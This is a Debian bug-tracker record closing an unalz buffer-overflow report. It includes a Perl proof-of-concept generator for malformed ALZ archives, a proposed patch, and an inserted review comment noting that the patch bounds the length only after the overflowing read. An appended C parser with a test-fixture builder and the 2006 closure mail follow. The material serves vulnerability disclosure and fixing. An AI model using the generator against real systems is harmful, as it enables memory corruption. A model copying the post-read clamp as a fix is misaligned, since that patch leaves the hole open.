Your message dated Sat, 17 Jun 2006 11:43:39 +0200 with message-id <20060617094339.GA309@uio.no> and subject line Bug#340842 acknowledged by developer (Re: unalz: buffer overflow when extracting archives) has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.)

Debian bug tracking system administrator (administrator, Debian Bugs database)
--- Begin Message ---
- To: submit@bugs.debian.org
- Subject: unalz: buffer overflow when extracting archives
- From: Ulf Harnhammar <metaur@telia.com>
- Date: Sat, 26 Nov 2005 11:38:07 +0100
- Message-id: <20051126103807.GA12158@localhost.localdomain>
- Reply-to: metaur@telia.com
Subject: unalz: buffer overflow when extracting archives
Package: unalz
Version: 0.52-1
Severity: grave
Justification: user security hole
Tags: security patch sarge etch sid

Hello,

I have found a buffer overflow security vulnerability in unalz. It occurs when it extracts malicious ALZ archives. I have attached the archives oflow333.alz (for sarge) and oflow1621.alz (for testing and unstable), as well as the program alzgen.pl that generated them and a patch that corrects this issue. It is also possible to upgrade to the latest upstream version 0.53, which also corrects it.

// Ulf Härnhammar, Debian Security Audit Project

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12-1-686
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Versions of packages unalz depends on:
ii  libc6       2.3.5-8    GNU C Library: Shared libraries an
ii  libgcc1     1:4.0.2-2  GCC support library
ii  libstdc++6  4.0.2-2    The GNU Standard C++ Library v3

unalz recommends no packages.

-- no debconf information

Attachment: oflow333.alz
Description: Binary data

Attachment: oflow1621.alz
Description: Binary data

```perl
#!/usr/bin/perl --
# alzgen
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

die "usage: $0 <length> <filename>\n" unless @ARGV == 2;

$len = shift;
$lenhi = int($len / 256);
$lenlo = $len - ($lenhi * 256);
$file = shift;

open(OUT, ">$file") or die "can't open file!\n";
print OUT "\x42\x4c\x5a\x01" .          # SIG_LOCAL_FILE_HEADER
          chr($lenlo) . chr($lenhi) .   # filename length
          "\x00" x 7 .
          'U' x $len;
close OUT or die "can't close file!?!?\n";
```

```diff
--- UnAlz.cpp.old	2004-11-25 07:23:36.000000000 +0100
+++ UnAlz.cpp	2005-11-20 01:04:23.000000000 +0100
@@ -359,6 +359,8 @@
 		return FALSE;
 	}
 	FRead(zipHeader.fileName, zipHeader.head.fileNameLength);
+	if(zipHeader.head.fileNameLength > MAX_PATH - 5)
+		zipHeader.head.fileNameLength = MAX_PATH - 5;
 	zipHeader.fileName[zipHeader.head.fileNameLength] = (CHAR)NULL;
```
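Review bot: The new bound is applied only after `FRead(zipHeader.fileName, zipHeader.head.fileNameLength);` has already copied fileNameLength bytes into zipHeader.fileName, so an oversized length still overruns that buffer during the read; the clamp protects only the later `zipHeader.fileName[zipHeader.head.fileNameLength] = (CHAR)NULL;` write. The check needs to come before the FRead, and since the code just above already bails out with `return FALSE;`, rejecting the entry there is preferable to silently truncating the name (a truncation placed before the read would also leave the surplus name bytes unread and desynchronise the archive stream). The `MAX_PATH - 5` margin is unexplained; tying the limit to the declared size of zipHeader.fileName, or a comment saying where the 5 comes from, would make it self-documenting.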
--- End Message ---
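An added illustration, not code from unalz or from the report: a reader for the local-file-header layout that alzgen.pl writes (4-byte signature, 2-byte little-endian name length, 7 further header bytes, then the name), which checks the length against the destination buffer before copying anything instead of clamping after the read. The function names, the status enum and the treatment of the 7 bytes after the length as opaque are assumptions; the fixture builder only mirrors the layout the report's script already shows, as constructed test input.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Local file header as alzgen.pl emits it: 4-byte signature "BLZ\x01",
 * 2-byte little-endian filename length, 7 header bytes the report does not
 * describe (assumption: treated as opaque and skipped), then the name bytes. */
#define ALZ_LOCAL_HDR_LEN 13
static const uint8_t ALZ_SIG[4] = {0x42, 0x4c, 0x5a, 0x01};

enum alz_status { ALZ_OK = 0, ALZ_BAD_SIG, ALZ_TRUNCATED, ALZ_NAME_TOO_LONG };

/* Parse one header from buf[0..n) into name (capacity namecap incl. NUL).
 * The length is bounded BEFORE any bytes are copied, so an oversized field
 * can never write past name; a clamp applied after the read cannot ensure that. */
enum alz_status alz_read_local_header(const uint8_t *buf, size_t n, char *name,
                                      size_t namecap, size_t *consumed)
{
    if (n < ALZ_LOCAL_HDR_LEN) return ALZ_TRUNCATED;
    if (memcmp(buf, ALZ_SIG, sizeof ALZ_SIG) != 0) return ALZ_BAD_SIG;
    size_t namelen = (size_t)buf[4] | ((size_t)buf[5] << 8);
    if (namelen >= namecap) return ALZ_NAME_TOO_LONG;   /* reject, do not clamp */
    if (n - ALZ_LOCAL_HDR_LEN < namelen) return ALZ_TRUNCATED;
    memcpy(name, buf + ALZ_LOCAL_HDR_LEN, namelen);
    name[namelen] = '\0';
    if (consumed) *consumed = ALZ_LOCAL_HDR_LEN + namelen;
    return ALZ_OK;
}

/* Constructed test fixture: a header laid out the way alzgen.pl lays it out. */
size_t alz_make_header(uint8_t *out, size_t outcap, size_t namelen)
{
    if (namelen > 0xffff || outcap < ALZ_LOCAL_HDR_LEN + namelen) return 0;
    memcpy(out, ALZ_SIG, sizeof ALZ_SIG);
    out[4] = (uint8_t)(namelen & 0xff);
    out[5] = (uint8_t)(namelen >> 8);
    memset(out + 6, 0, 7);
    memset(out + ALZ_LOCAL_HDR_LEN, 'U', namelen);
    return ALZ_LOCAL_HDR_LEN + namelen;
}

int main(void)
{
    uint8_t buf[512];
    char name[256];                                    /* fixed-size destination */
    size_t n = alz_make_header(buf, sizeof buf, 333);  /* same shape as oflow333.alz */
    printf("status=%d\n", alz_read_local_header(buf, n, name, sizeof name, NULL));
    return 0;
}
```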
--- Begin Message ---
- To: Steve Langasek <vorlon@debian.org>
- Cc: Ulf Harnhammar <metaur@operamail.com>, 340842-done@bugs.debian.org
- Subject: Re: Bug#340842 acknowledged by developer (Re: unalz: buffer overflow when extracting archives)
- From: "Steinar H. Gunderson" <sgunderson@bigfoot.com>
- Date: Sat, 17 Jun 2006 11:43:39 +0200
- Message-id: <20060617094339.GA309@uio.no>
- In-reply-to: <20060316183533.GE3336@mauritius.dodds.net>
- References: <20060316174449.F20FA43A3B@ws5-1.us4.outblaze.com> <20060316183533.GE3336@mauritius.dodds.net>
Version: 0.55-1

On Thu, Mar 16, 2006 at 10:35:33AM -0800, Steve Langasek wrote:
>> It still looks closed (in all versions) to me. Are you sure that that is
>> what you want, instead of - say - fixing it?
> http://bugs.debian.org/cgi-bin/pkgreport.cgi?src=unalz&dist=unstable

This was fixed in a QA upload a while ago (0.55-1), since upstream 0.53 fixed it; the changelog missed it, though. I've verified that the code does indeed contain the patch given in the patch log, so I'm marking it as closed.

/* Steinar */
--
Homepage: http://www.sesse.net/
--- End Message ---